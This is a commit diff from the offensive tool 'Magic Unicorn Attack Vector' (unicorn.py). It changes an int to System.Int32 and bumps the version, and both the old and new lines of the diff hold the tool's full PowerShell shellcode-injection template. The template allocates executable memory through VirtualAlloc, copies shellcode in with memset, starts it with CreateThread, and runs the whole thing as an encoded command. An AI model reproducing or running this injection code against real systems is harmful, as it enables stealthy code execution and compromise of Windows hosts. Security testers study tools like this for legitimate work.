use System.Int32 instead of int

jirohori · Sep 11, 2018 · 5e623a2 · 5e623a2
1 parent d85232b
commit 5e623a2
Show file tree

Hide file tree

Showing 2 changed files with 8 additions and 2 deletions.
diff --git a/CHANGELOG.txt b/CHANGELOG.txt
@@ -1,3 +1,9 @@
+~~~~~~~~~~~~~~~~
+version 3.2.10
+~~~~~~~~~~~~~~~~
+
+* use System.Int32 instead of int
+
 ~~~~~~~~~~~~~~~~
 version 3.2.9
 ~~~~~~~~~~~~~~~~

diff --git a/unicorn.py b/unicorn.py
@@ -429,7 +429,7 @@ def settings_ms():
 
 # usage banner
 def gen_usage():
-    print("-------------------- Magic Unicorn Attack Vector v3.2.9 -----------------------------")
+    print("-------------------- Magic Unicorn Attack Vector v3.2.10 -----------------------------")
     print("\nNative x86 powershell injection attacks on any Windows platform.")
     print("Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)")
     print("Twitter: @TrustedSec, @HackingDave")
@@ -880,7 +880,7 @@ def gen_shellcode_attack(payload, ipaddr, port):
     randomize_service_name = generate_random_string(4,5)
 
     # one line shellcode injection with native x86 shellcode
-    powershell_code = (r'''$1 = '$t = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern int CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $t -Name "%s" -namespace Win32Functions -passthru;[Byte[]]$z = %s;$g = 0x$randstack;if ($z.Length -gt 0x$randstack){$g = $z.Length};$x=$w::VirtualAlloc(0,0x$randstack,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;){Start-Sleep 60};';$h = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));iex "& C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell -ec $h"''' % (randomize_service_name,shellcode))
+    powershell_code = (r'''$1 = '$t = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern System.Int32 CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $t -Name "%s" -namespace Win32Functions -passthru;[Byte[]]$z = %s;$g = 0x$randstack;if ($z.Length -gt 0x$randstack){$g = $z.Length};$x=$w::VirtualAlloc(0,0x$randstack,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;){Start-Sleep 60};';$h = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));iex "& C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell -ec $h"''' % (randomize_service_name,shellcode))
 
     # run it through a lame var replace
     powershell_code = powershell_code.replace("$1", var1).replace("$c", var2).replace(